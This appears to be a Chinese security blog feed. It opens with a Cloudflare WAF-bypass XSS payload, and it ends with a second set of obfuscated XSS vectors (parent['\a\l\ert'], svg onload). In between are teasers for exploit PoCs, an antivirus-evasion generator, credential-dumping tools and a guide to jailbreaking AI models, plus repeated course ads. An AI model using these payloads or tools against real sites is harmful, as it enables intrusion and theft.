Cloudflare Xss Bypass Tips
poc:<select> <style> </select><svg onload=alert (1) ></style >"> <img src = x onerrora = confirm ()
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文CVE-2025-29927:Next.js中间件绕过漏洞POC
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文Dalfox:更新v2.10.0使用更少的CPU,速度更快
Dalfox v2.10.0已发布! 它使用更少的CPU ,而XSS扫描比以前更快。地址:https://github.com/hahwul/dalfox
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文API-Pentesting-Tools:各类API测试工具集合(非常全!)
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文saas-attacks:SaaS 的攻击技术的集合
GitHub - pushsecurity/saas-attacks :攻击性安全驱动防御性安全。 我们正在分享一系列SaaS攻击技术,以帮助防御者了解他们面临的威胁。地址:https://githu
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文uac:专为取证调查人员、安全分析师设计的响应工具
GitHub - tclahr/uacUAC是一款功能强大且可扩展的事件响应工具,专为取证调查人员、安全分析师和IT专业人员而设计。它可以自动收集来自各种类Unix系统的工件,包括AIX、ESXi地址
阅读全文Magic Resume:一款快速自定义简历的开源工具
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文NavicatPwn:内网渗透获取 Navicat Premium 保存的数据库账密
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文Web应用程序渗透测试和漏洞赏金狩猎的综合指南
Web应用程序渗透测试和漏洞赏金狩猎的综合指南,涵盖识别和利用的方法、工具和资源:地址:https://github.com/xalgord/Massive-Web-Application-Penet
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文ByDeF:生成bypassWindows Defender/AV的exe
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文xss0r:当今最好的XSS工具?
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文Confusional:JWT算法混淆攻击的Python脚本
Confusional:执行JWT算法混淆攻击的Python脚本地址:https://github.com/RemmyNine/Confusional
阅读全文lazys3:不同排列对AWS s3存储桶进行暴力破解的Ruby脚本
使用不同排列对AWS s3存储桶进行暴力破解的Ruby脚本 作者: @NahamSec 地址: https://github.com/nahamsec/lazys3$ ruby lazys3.rb <
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文CVE-2025-24071:通过RAR/ZIP做到解压就传输NTLM哈希
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文fuzzlists:渗透测试和漏洞赏金FUZZ字典
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文Databasetools:非常灵活的一款数据库提权工具
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文malicious-devfile-registry :在Gitlab中利用CVE-2024-0402
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文CVE-2025-24813-PoC:Apache Tomcat 远程代码执行漏洞批量检测脚本
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文AI安全:Prompt越狱手册
免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删
阅读全文Z1sec推出了最靠谱的网络安全1对1课程
广告时间z1sec开启了全新的网络安全课程,全课程只采用 1对1 的方式授课。• 拒绝低效率网络安全学习• 拒绝传统课长篇大论不着重点• 拒绝交了钱却没有坚持力而放弃• 拒绝普通培训的低效沟通,一对一
阅读全文又一个非常有效的xss Tips
之前写过一个top来拼接并执行的Tips这次换个函数,一样可以parent['\a\l\ert'](1)parent['\a\l\ert']`1` 用svg来装载下:<svg/onload=paren
阅读全文